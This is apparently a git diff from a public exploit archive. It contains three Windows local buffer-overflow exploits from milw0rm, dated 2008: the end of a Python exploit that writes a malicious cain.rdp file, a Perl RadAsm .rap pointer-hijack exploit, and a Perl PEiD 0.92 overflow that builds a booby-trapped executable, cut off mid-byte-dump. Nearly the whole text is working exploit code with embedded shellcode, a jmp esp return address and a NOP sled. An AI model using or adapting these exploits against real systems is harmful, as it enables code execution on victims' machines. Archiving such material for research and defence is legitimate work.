+shellcode+= "\x47\x0f\xfb\x94\x7d\x99\x34\x64\x33\x28\x9b\x3f\x62\xcc\xfb\x06"
+shellcode+= "\xcd\xc1\x5b\xeb\x19\xd1\x11\x8b\xcd\xd1\x9b\x61\xad\x44\x4c\x44"
+shellcode+= "\x42\x0e\x21\xa0\x22\x46\x50\x50\xc3\x0d\x68\x6c\xcd\x8d\x1c\xeb"
+shellcode+= "\x36\xd1\xbd\xeb\x2e\xc5\xfb\x69\xcd\x4d\xa0\x60\x46\xcd\x9b\x08"
+shellcode+= "\x7a\x92\x21\x96\x26\x9b\x99\x98\xc5\x0d\x6b\x30\x2e\x3d\x9a\x64"
+shellcode+= "\x19\xa5\x88\x9e\xcc\xc3\x47\x9f\xa1\xae\x7d\x04\x68\xa8\x68\x05"
+shellcode+= "\x66\xe2\x73\x40\x28\xa8\x64\x40\x33\xbe\x75\x12\x66\xb8\x63\x05"
+shellcode+= "\x34\xed\x60\x01\x35\xbe\x30\x4f\x07\x89\x54\x40\x60\xeb\x30\x0e"
+shellcode+= "\x23\xb9\x30\x0c\x29\xae\x71\x0c\x21\xbf\x7f\x15\x36\xed\x51\x04"
+shellcode+= "\x2b\xa4\x7e\x09\x35\xb9\x62\x01\x32\xa2\x62\x13\x66\xb8\x63\x05"
+shellcode+= "\x34\xed\x3f\x21\x02\x89\x10\x60";
+
+# and if you want to test it..this shellcode will open calc.exe
+#shellcode = 
"\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2"
+#shellcode+= "\xab\x63\x3d\x83\xeb\xfc\xe2\xf4\x4e\x43\x27\x3d\xb2\xab\xe8\x78"
+#shellcode+= "\x8e\x20\x1f\x38\xca\xaa\x8c\xb6\xfd\xb3\xe8\x62\x92\xaa\x88\x74"
+#shellcode+= "\x39\x9f\xe8\x3c\x5c\x9a\xa3\xa4\x1e\x2f\xa3\x49\xb5\x6a\xa9\x30"
+#shellcode+= "\xb3\x69\x88\xc9\x89\xff\x47\x39\xc7\x4e\xe8\x62\x96\xaa\x88\x5b"
+#shellcode+= "\x39\xa7\x28\xb6\xed\xb7\x62\xd6\x39\xb7\xe8\x3c\x59\x22\x3f\x19"
+#shellcode+= "\xb6\x68\x52\xfd\xd6\x20\x23\x0d\x37\x6b\x1b\x31\x39\xeb\x6f\xb6"
+#shellcode+= "\xc2\xb7\xce\xb6\xda\xa3\x88\x34\x39\x2b\xd3\x3d\xb2\xab\xe8\x55"
+#shellcode+= "\x8e\xf4\x52\xcb\xd2\xfd\xea\xc5\x31\x6b\x18\x6d\xda\x5b\xe9\x39"
+#shellcode+= "\xed\xc3\xfb\xc3\x38\xa5\x34\xc2\x55\xc8\x02\x51\xd1\x85\x06\x45"
+#shellcode+= "\xd7\xab\x63\x3d";
+
+eip = "\xB7\x2F\x49\x7E" #user32.dll jmp esp 0x7E492FB7
+
+chars = "E"*8206
+print "Bu!ld!ng 3xpl0!t....Pl3453 W4!t"
+print ""
+file = open('cain.rdp','w')
+file.write (chars+eip+eip+"\x90"*10+shellcode)
+file.close()
+print "D0NE!"
+
+# milw0rm.com [2008-12-03]
diff --git a/platforms/windows/local/7334.pl b/platforms/windows/local/7334.pl
index c6aa22cb7..f89189fba 100755
--- a/platforms/windows/local/7334.pl
+++ b/platforms/windows/local/7334.pl
@@ -1,66 +1,66 @@ -#!/usr/bin/perl -# RadAsm <=2.2.1.5 WindowCallProcA Pointer Hijack Exploit -#Tested on Windows XP SP2 FR,perhaps work as will underWindows XP SP3. -#Long buffer passed to the program by Group key in the project file ".rap files" can lead to Overwrite the pointer of -#WindowCallProcA that was stored in memory. -#So we will over write the pointer and make it point to our shellcode address -#This exploit was dedicated to the previous version "im to lazy to make other exploit for the newest version :)" 2.2.1 #if you want to build your own exploit, pay attention to the address of shellcode and the buffer befor and after the #shellcode. -#Sorry for my bad english :=) -#greetZ to:Gaming_Master,Mouradpr,Pirat_Digital,Koudelka,djug,Alpha_Hunter,DeltaAzize,synt_err,super-crystal,Al-alamE -#Anaconda,AT4RE TEAM,Arab4Services TEAM,All Algerian Hackerz. - -print "\nRadAsm <=2.2.1.5 WindowCallProcA Pointer Hijack Exploit\n"; -print "Discovered by DATA_SNIPER\n"; -print "\n"; -print "[->] Building poc.rap..\n"; -print "[->] poc.rap Created have unf :)\n"; -# win32_exec - EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com -my $shellcode = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". -"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x38\x4e\x47". -"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x48". -"\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x33\x4b\x58". -"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c". -"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x50\x45\x37\x45\x4e\x4b\x48". 
-"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". -"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x31\x4b\x58". -"\x41\x50\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x50\x43\x4c\x41\x33". -"\x42\x4c\x46\x56\x4b\x38\x42\x44\x42\x43\x45\x58\x42\x4c\x4a\x47". -"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x38\x42\x37\x4e\x51\x4d\x4a". -"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b". -"\x42\x30\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x53\x4f\x45\x41\x33". -"\x48\x4f\x42\x56\x48\x35\x49\x38\x4a\x4f\x43\x38\x42\x4c\x4b\x47". -"\x42\x45\x4a\x46\x50\x57\x4a\x4d\x44\x4e\x43\x37\x4a\x36\x4a\x49". -"\x50\x4f\x4c\x48\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x56". -"\x4e\x36\x43\x36\x50\x52\x45\x46\x4a\x57\x45\x56\x42\x30\x5a"; - -$FileHeader = -"\x5B\x50\x72\x6F\x6A\x65\x63\x74\x5D\x0D\x0A\x41\x73\x73\x65\x6D\x62\x6C\x65\x72\x3D\x6D\x61\x73\x6D\x0D\x0A\x47\x72\x6F\x75\x70". -"\x3D\x31\x0D\x0A\x47\x72\x6F\x75\x70\x45\x78\x70\x61\x6E\x64\x3D\x31\x0D\x0A\x5B\x46\x69\x6C\x65\x73\x5D\x0D\x0A\x31\x3D\x41\x56". -"\x50\x20\x4F\x76\x65\x72\x2E\x41\x73\x6D\x0D\x0A\x32\x3D\x41\x56\x50\x20\x4F\x76\x65\x72\x2E\x49\x6E\x63\x0D\x0A\x5B\x4D\x61\x6B". -"\x65\x46\x69\x6C\x65\x73\x5D\x0D\x0A\x30\x3D\x41\x56\x50\x20\x4F\x76\x65\x72\x2E\x72\x65\x73\x0D\x0A\x5B\x4D\x61\x6B\x65\x44\x65". -"\x66\x5D\x0D\x0A\x4D\x65\x6E\x75\x3D\x30\x2C\x31\x2C\x31\x2C\x31\x2C\x31\x2C\x31\x2C\x31\x2C\x30\x2C\x30\x2C\x30\x2C\x30\x2C\x30". -"\x2C\x30\x2C\x30\x2C\x30\x2C\x30\x0D\x0A\x31\x3D\x34\x2C\x4F\x2C\x24\x42\x5C\x52\x43\x2E\x45\x58\x45\x20\x2F\x76\x2C\x31\x0D\x0A". -"\x32\x3D\x33\x2C\x4F\x2C\x24\x42\x5C\x4D\x4C\x2E\x45\x58\x45\x20\x2F\x63\x20\x2F\x63\x6F\x66\x66\x20\x2F\x43\x70\x20\x2F\x6E\x6F". -"6C\x6F\x67\x6F\x20\x2F\x49\x22\x24\x49\x22\x2C\x32\x0D\x0A\x33\x3D\x35\x2C\x4F\x2C\x24\x42\x5C\x4C\x49\x4E\x4B\x2E\x45\x58\x45". -"\x20\x2F\x53\x55\x42\x53\x59\x53\x54\x45\x4D\x3A\x57\x49\x4E\x44\x4F\x57\x53\x20\x2F\x52\x45\x4C\x45\x41\x53\x45\x20\x2F\x56\x45". 
-"\x52\x53\x49\x4F\x4E\x3A\x34\x2E\x30\x20\x2F\x4C\x49\x42\x50\x41\x54\x48\x3A\x22\x24\x4C\x22\x20\x2F\x4F\x55\x54\x3A\x22\x24\x35". -"\x22\x2C\x33\x0D\x0A\x34\x3D\x30\x2C\x30\x2C\x2C\x35\x0D\x0A\x35\x3D\x72\x73\x72\x63\x2E\x6F\x62\x6A\x2C\x4F\x2C\x24\x42\x5C\x43". -"\x56\x54\x52\x45\x53\x2E\x45\x58\x45\x2C\x72\x73\x72\x63\x2E\x72\x65\x73\x0D\x0A\x36\x3D\x2A\x2E\x6F\x62\x6A\x2C\x4F\x2C\x24\x42". -"\x5C\x4D\x4C\x2E\x45\x58\x45\x20\x2F\x63\x20\x2F\x63\x6F\x66\x66\x20\x2F\x43\x70\x20\x2F\x6E\x6F\x6C\x6F\x67\x6F\x20\x2F\x49\x22". -"\x24\x49\x22\x2C\x2A\x2E\x61\x73\x6D\x0D\x0A\x37\x3D\x30\x2C\x30\x2C\x22\x24\x45\x5C\x4F\x6C\x6C\x79\x44\x62\x67\x22\x2C\x35\x0D". -"\x0A\x5B\x47\x72\x6F\x75\x70\x5D\x0D\x0A\x47\x72\x6F\x75\x70\x3D"; -$hijackedPointer = "\x46\x52\x49\x00"; -$overflow = "\x41" x 2143 ; -$INCSELEDGE = "\x41" x 66 ; -$SD = "\x00\x0D\x0A" ; -open(my $poc, "> POC.rap"); -print $poc $FileHeader.$INCSELEDGE.$shellcode.$overflow.$hijackedPointer.$SD; -close($poc); - -# milw0rm.com [2008-12-03] +#!/usr/bin/perl +# RadAsm <=2.2.1.5 WindowCallProcA Pointer Hijack Exploit +#Tested on Windows XP SP2 FR,perhaps work as will underWindows XP SP3. +#Long buffer passed to the program by Group key in the project file ".rap files" can lead to Overwrite the pointer of +#WindowCallProcA that was stored in memory. +#So we will over write the pointer and make it point to our shellcode address +#This exploit was dedicated to the previous version "im to lazy to make other exploit for the newest version :)" 2.2.1 #if you want to build your own exploit, pay attention to the address of shellcode and the buffer befor and after the #shellcode. +#Sorry for my bad english :=) +#greetZ to:Gaming_Master,Mouradpr,Pirat_Digital,Koudelka,djug,Alpha_Hunter,DeltaAzize,synt_err,super-crystal,Al-alamE +#Anaconda,AT4RE TEAM,Arab4Services TEAM,All Algerian Hackerz. 
+ +print "\nRadAsm <=2.2.1.5 WindowCallProcA Pointer Hijack Exploit\n"; +print "Discovered by DATA_SNIPER\n"; +print "\n"; +print "[->] Building poc.rap..\n"; +print "[->] poc.rap Created have unf :)\n"; +# win32_exec - EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com +my $shellcode = +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". +"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x38\x4e\x47". +"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x48". +"\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x33\x4b\x58". +"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c". +"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x50\x45\x37\x45\x4e\x4b\x48". +"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". +"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x31\x4b\x58". +"\x41\x50\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x50\x43\x4c\x41\x33". +"\x42\x4c\x46\x56\x4b\x38\x42\x44\x42\x43\x45\x58\x42\x4c\x4a\x47". +"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x38\x42\x37\x4e\x51\x4d\x4a". +"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b". +"\x42\x30\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x53\x4f\x45\x41\x33". +"\x48\x4f\x42\x56\x48\x35\x49\x38\x4a\x4f\x43\x38\x42\x4c\x4b\x47". +"\x42\x45\x4a\x46\x50\x57\x4a\x4d\x44\x4e\x43\x37\x4a\x36\x4a\x49". +"\x50\x4f\x4c\x48\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x56". +"\x4e\x36\x43\x36\x50\x52\x45\x46\x4a\x57\x45\x56\x42\x30\x5a"; + +$FileHeader = +"\x5B\x50\x72\x6F\x6A\x65\x63\x74\x5D\x0D\x0A\x41\x73\x73\x65\x6D\x62\x6C\x65\x72\x3D\x6D\x61\x73\x6D\x0D\x0A\x47\x72\x6F\x75\x70". 
+"\x3D\x31\x0D\x0A\x47\x72\x6F\x75\x70\x45\x78\x70\x61\x6E\x64\x3D\x31\x0D\x0A\x5B\x46\x69\x6C\x65\x73\x5D\x0D\x0A\x31\x3D\x41\x56". +"\x50\x20\x4F\x76\x65\x72\x2E\x41\x73\x6D\x0D\x0A\x32\x3D\x41\x56\x50\x20\x4F\x76\x65\x72\x2E\x49\x6E\x63\x0D\x0A\x5B\x4D\x61\x6B". +"\x65\x46\x69\x6C\x65\x73\x5D\x0D\x0A\x30\x3D\x41\x56\x50\x20\x4F\x76\x65\x72\x2E\x72\x65\x73\x0D\x0A\x5B\x4D\x61\x6B\x65\x44\x65". +"\x66\x5D\x0D\x0A\x4D\x65\x6E\x75\x3D\x30\x2C\x31\x2C\x31\x2C\x31\x2C\x31\x2C\x31\x2C\x31\x2C\x30\x2C\x30\x2C\x30\x2C\x30\x2C\x30". +"\x2C\x30\x2C\x30\x2C\x30\x2C\x30\x0D\x0A\x31\x3D\x34\x2C\x4F\x2C\x24\x42\x5C\x52\x43\x2E\x45\x58\x45\x20\x2F\x76\x2C\x31\x0D\x0A". +"\x32\x3D\x33\x2C\x4F\x2C\x24\x42\x5C\x4D\x4C\x2E\x45\x58\x45\x20\x2F\x63\x20\x2F\x63\x6F\x66\x66\x20\x2F\x43\x70\x20\x2F\x6E\x6F". +"6C\x6F\x67\x6F\x20\x2F\x49\x22\x24\x49\x22\x2C\x32\x0D\x0A\x33\x3D\x35\x2C\x4F\x2C\x24\x42\x5C\x4C\x49\x4E\x4B\x2E\x45\x58\x45". +"\x20\x2F\x53\x55\x42\x53\x59\x53\x54\x45\x4D\x3A\x57\x49\x4E\x44\x4F\x57\x53\x20\x2F\x52\x45\x4C\x45\x41\x53\x45\x20\x2F\x56\x45". +"\x52\x53\x49\x4F\x4E\x3A\x34\x2E\x30\x20\x2F\x4C\x49\x42\x50\x41\x54\x48\x3A\x22\x24\x4C\x22\x20\x2F\x4F\x55\x54\x3A\x22\x24\x35". +"\x22\x2C\x33\x0D\x0A\x34\x3D\x30\x2C\x30\x2C\x2C\x35\x0D\x0A\x35\x3D\x72\x73\x72\x63\x2E\x6F\x62\x6A\x2C\x4F\x2C\x24\x42\x5C\x43". +"\x56\x54\x52\x45\x53\x2E\x45\x58\x45\x2C\x72\x73\x72\x63\x2E\x72\x65\x73\x0D\x0A\x36\x3D\x2A\x2E\x6F\x62\x6A\x2C\x4F\x2C\x24\x42". +"\x5C\x4D\x4C\x2E\x45\x58\x45\x20\x2F\x63\x20\x2F\x63\x6F\x66\x66\x20\x2F\x43\x70\x20\x2F\x6E\x6F\x6C\x6F\x67\x6F\x20\x2F\x49\x22". +"\x24\x49\x22\x2C\x2A\x2E\x61\x73\x6D\x0D\x0A\x37\x3D\x30\x2C\x30\x2C\x22\x24\x45\x5C\x4F\x6C\x6C\x79\x44\x62\x67\x22\x2C\x35\x0D". 
+"\x0A\x5B\x47\x72\x6F\x75\x70\x5D\x0D\x0A\x47\x72\x6F\x75\x70\x3D";
+$hijackedPointer = "\x46\x52\x49\x00";
+$overflow = "\x41" x 2143 ;
+$INCSELEDGE = "\x41" x 66 ;
+$SD = "\x00\x0D\x0A" ;
+open(my $poc, "> POC.rap");
+print $poc $FileHeader.$INCSELEDGE.$shellcode.$overflow.$hijackedPointer.$SD;
+close($poc);
+
+# milw0rm.com [2008-12-03]
diff --git a/platforms/windows/local/7347.pl b/platforms/windows/local/7347.pl
index 83cef41b4..42fd0527f 100755
--- a/platforms/windows/local/7347.pl
+++ b/platforms/windows/local/7347.pl
@@ -1,135 +1,135 @@ -#!/usr/bin/perl -# -# PEiD <= 0.92 Buffer Overflow Universal Exploit -# Exploit by SkD (skdrat@hotmail.com) -# ---------------------------------------------- -# An old vulnerability but no existing exploit -# for it, so here it is. Of course, I had to make it -# universal because of that.This exploit will work -# on all OS versions (XP, Vista, 2003, 2000). -# You have limited space for the shellcode -# (around 500, it can be tweaked for more space) -# and there are no character restrictions. -# -# You can download PEiD 0.92 here: -# http://www.absolutelock.de/construction/files/releases/PEiD.zip -# -# To trigger the exploit, load the created executable and then -# click the "First Bytes" arrow. -# Check it out :). -# -# Note: -# Author has no responsibility over the damage you do with this. - -use strict; use warnings; - -# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com -my $shellcode = -"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19". -"\xc5\xd8\x59\x83\xeb\xfc\xe2\xf4\xe5\x2d\x9c\x59\x19\xc5\x53\x1c". -"\x25\x4e\xa4\x5c\x61\xc4\x37\xd2\x56\xdd\x53\x06\x39\xc4\x33\x10". -"\x92\xf1\x53\x58\xf7\xf4\x18\xc0\xb5\x41\x18\x2d\x1e\x04\x12\x54". -"\x18\x07\x33\xad\x22\x91\xfc\x5d\x6c\x20\x53\x06\x3d\xc4\x33\x3f". -"\x92\xc9\x93\xd2\x46\xd9\xd9\xb2\x92\xd9\x53\x58\xf2\x4c\x84\x7d". -"\x1d\x06\xe9\x99\x7d\x4e\x98\x69\x9c\x05\xa0\x55\x92\x85\xd4\xd2". -"\x69\xd9\x75\xd2\x71\xcd\x33\x50\x92\x45\x68\x59\x19\xc5\x53\x31". -"\x25\x9a\xe9\xaf\x79\x93\x51\xa1\x9a\x05\xa3\x09\x71\x35\x52\x5d". -"\x46\xad\x40\xa7\x93\xcb\x8f\xa6\xfe\xa6\xb9\x35\x7a\xeb\xbd\x21". -"\x7c\xc5\xd8\x59"; -my $exe_part1 = -"\x4D\x5A\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00\xB8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xC8\x00\x00\x00". 
-"\x0E\x1F\xBA\x0E\x00\xB4\x09\xCD\x21\xB8\x01\x4C\xCD\x21\x54\x68\x69\x73\x20\x70\x72\x6F\x67\x72\x61\x6D\x20\x63\x61\x6E\x6E\x6F". -"\x74\x20\x62\x65\x20\x72\x75\x6E\x20\x69\x6E\x20\x44\x4F\x53\x20\x6D\x6F\x64\x65\x2E\x0D\x0D\x0A\x24\x00\x00\x00\x00\x00\x00\x00". -"\xA5\x8A\x2D\xC7\xE1\xEB\x43\x94\xE1\xEB\x43\x94\xE1\xEB\x43\x94\xBE\xC9\x48\x94\xE4\xEB\x43\x94\xE1\xEB\x42\x94\xEA\xEB\x43\x94". -"\x83\xF4\x50\x94\xE4\xEB\x43\x94\x09\xF4\x48\x94\xE3\xEB\x43\x94\x52\x69\x63\x68\xE1\xEB\x43\x94\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4C\x01\x03\x00\x86\xE1\x38\x49\x00\x00\x00\x00\x00\x00\x00\x00\xE0\x00\x0F\x01". -"\x0B\x01\x06\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x72\x10\x00\x00\x00\x10\x00\x00\x00\x20\x00\x00\x00\x00\x40\x00". -"\x00\x10\x00\x00\x00\x02\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x04\x00\x00". -"\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x30\x20\x00\x00\x3C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x20\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x2E\x74\x65\x78\x74\x00\x00\x00\xFC\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x20\x00\x00\x60\x2E\x72\x64\x61\x74\x61\x00\x00\x44\x01\x00\x00\x00\x20\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x40\x2E\x64\x61\x74\x61\x00\x00\x00\x3C\x02\x00\x00\x00\x30\x00\x00". 
-"\x00\x02\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
-"\x6A\x00\x68\x28\x30\x40\x00\x68\x18\x30\x40\x00\x6A\x00\xFF\x15\x24\x20\x40\x00\x68\x08\x30\x40\x00\xE8\x12\x00\x00\x00\x83\xC4". -"\x04\x33\xC0\xC3\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x55\x8B\xEC\x81\xEC\x04\x04\x00\x00\x8D\x45\x0C\x56\x50\x8D\x85". -"\xFC\xFB\xFF\xFF\xFF\x75\x08\x50\xFF\x15\x28\x20\x40\x00\x8B\xF0\x8D\x45\xFC\x6A\x00\x50\x8D\x85\xFC\xFB\xFF\xFF\x56\x50\x6A\xF5". -"\xFF\x15\x08\x20\x40\x00\x50\xFF\x15\x04\x20\x40\x00\x8B\xC6\x5E\xC9\xC3\x56\xE8\x83\x00\x00\x00\x8B\xF0\xE8\x48\x00\x00\x00\x68". -"\x04\x30\x40\x00\x68\x00\x30\x40\x00\xE8\x1F\x00\x00\x00\x6A\x00\x68\x38\x30\x40\x00\x56\xE8\x65\xFF\xFF\xFF\x83\xC4\x14\x8B\xF0". -"\xE8\x3A\x00\x00\x00\x56\xFF\x15\x0C\x20\x40\x00\x5E\x56\x8B\x74\x24\x08\x3B\x74\x24\x0C\x73\x0D\x8B\x06\x85\xC0\x74\x02\xFF\xD0". -"\x83\xC6\x04\xEB\xED\x5E\xC3\x6A\x20\x58\x6A\x04\x50\xA3\x30\x30\x40\x00\xE8\x0B\x01\x00\x00\x59\xA3\x2C\x30\x40\x00\x59\xC3\x8B". -"\x0D\x34\x30\x40\x00\x85\xC9\x74\x11\xA1\x2C\x30\x40\x00\x8D\x0C\x88\x51\x50\xE8\xB5\xFF\xFF\xFF\x59\x59\xC3\x53\x56\x33\xDB\x57". -"\x89\x1D\x38\x30\x40\x00\xFF\x15\x1C\x20\x40\x00\x8B\xF8\x57\xFF\x15\x18\x20\x40\x00\x40\x50\x53\xFF\x15\x14\x20\x40\x00\x50\xFF". -"\x15\x00\x20\x40\x00\x8B\xF0\x3B\xF3\x75\x07\x33\xC0\xE9\xAC\x00\x00\x00\x57\x56\xFF\x15\x10\x20\x40\x00\x80\x3E\x22\x75\x1A\x46". -"\x89\x35\x38\x30\x40\x00\x8A\x06\x3A\xC3\x74\x07\x3C\x22\x74\x03\x46\xEB\xF3\x38\x1E\x75\x1D\xEB\xD2\x89\x35\x38\x30\x40\x00\x8A". -"\x06\x3A\xC3\x74\x0B\x3C\x20\x74\x07\x3C\x09\x74\x03\x46\xEB\xEF\x38\x1E\x74\x03\x88\x1E\x46\x6A\x01\xB9\x3C\x30\x40\x00\x58\x8A". -"\x16\x3A\xD3\x74\x05\x80\xFA\x20\x74\x05\x80\xFA\x09\x75\x03\x46\xEB\xED\x8A\x16\x3A\xD3\x74\x46\x80\xFA\x22\x75\x17\x46\x40\x89". -"\x31\x83\xC1\x04\x89\x19\x8A\x16\x3A\xD3\x74\x23\x80\xFA\x22\x74\x1E\x46\xEB\xF2\x89\x31\x40\x83\xC1\x04\x89\x19\x8A\x16\x3A\xD3". -"\x74\x0D\x80\xFA\x20\x74\x08\x80\xFA\x09\x74\x03\x46\xEB\xED\x38\x1E\x74\x0B\x88\x1E\x46\x81\xF9\x38\x32\x40\x00\x7C\xA1\x5F\x5E". 
